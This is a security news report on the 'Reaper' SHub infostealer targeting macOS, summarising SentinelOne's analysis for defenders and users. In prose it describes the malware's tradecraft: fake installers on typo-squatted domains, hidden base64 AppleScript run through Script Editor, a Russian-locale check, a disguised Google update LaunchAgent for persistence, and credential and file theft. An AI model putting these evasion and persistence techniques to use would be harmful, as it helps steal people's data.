macOS users are currently facing a new cybersecurity threat as a variant of the SHub infostealer malware, known as ‘Reaper,’ has emerged. This malware employs a deceptive tactic by using a faux Google Software Update LaunchAgent to establish persistent access on compromised systems. The Reaper malware is particularly insidious due to its ability to disguise itself by mimicking trusted brands, making detection challenging without specialized security tools.
Complex Disguise Tactics
The Reaper malware is notable for its evolving disguises at each stage of its infection process. Victims may initially encounter fake installers for popular apps like WeChat or Miro, which are disseminated via domains that closely resemble those associated with Microsoft. Once the malicious payload is activated, it masquerades as an Apple security update, with its persistence mechanism hidden within directories designed to imitate Google’s software update service. This attack strategy cleverly exploits the reputations of three major tech brands.
Researchers from SentinelOne have conducted a thorough analysis of this Reaper variant. Their findings reveal that the malware is a continuation of the expanding SHub malware family, which has seen significant growth over the past two years. The team highlighted the malware’s use of typo-squatted domains for its operation and its reliance on AppleScript to evade typical detection methods.
Technical Details and Impact
Reaper’s execution bypasses Apple’s Terminal mitigation by leveraging the Script Editor, using dynamically constructed, base64-encoded commands that remain hidden from the visible interface. The malware checks local settings to identify Russian-language input sources, and if detected, it communicates with its command and control server before exiting. Otherwise, it proceeds to execute a second AppleScript in memory, ensuring it leaves no trace on the local disk.
To maintain persistence, Reaper sets up a directory structure mimicking Google’s Keystone update service. It installs a base64-decoded bash script named GoogleUpdate in the ~/Library/Application Support/Google/GoogleUpdate.app/Contents/MacOS/ directory and registers a LaunchAgent with a property list to execute this script every 60 seconds. This mechanism allows continuous system detail uploads to the attacker’s server, providing a persistent remote execution channel.
Data Exfiltration and Security Advice
The Reaper malware includes a FileGrabber routine designed to scan for files with potential business or financial value. It targets specific file types and sizes, including documents, images, and files from cryptocurrency applications. The malware also harvests browser credentials and developer keystrokes while employing methods to thwart security analysis.
SentinelOne advises users to be cautious of scripts from websites that claim a manual security update is necessary, as Apple does not prompt users to run commands in the Script Editor. Users should verify URLs and only download software from official sources. Security defenders are urged to monitor for unexpected AppleScript activity, unusual outbound connections, and new LaunchAgents associated with trusted software vendors.
Indicators of compromise include typo-squatted domains, specific file paths, and API endpoints used by the malware. Users are encouraged to follow the latest updates on cybersecurity threats and implement robust security measures to protect their systems.
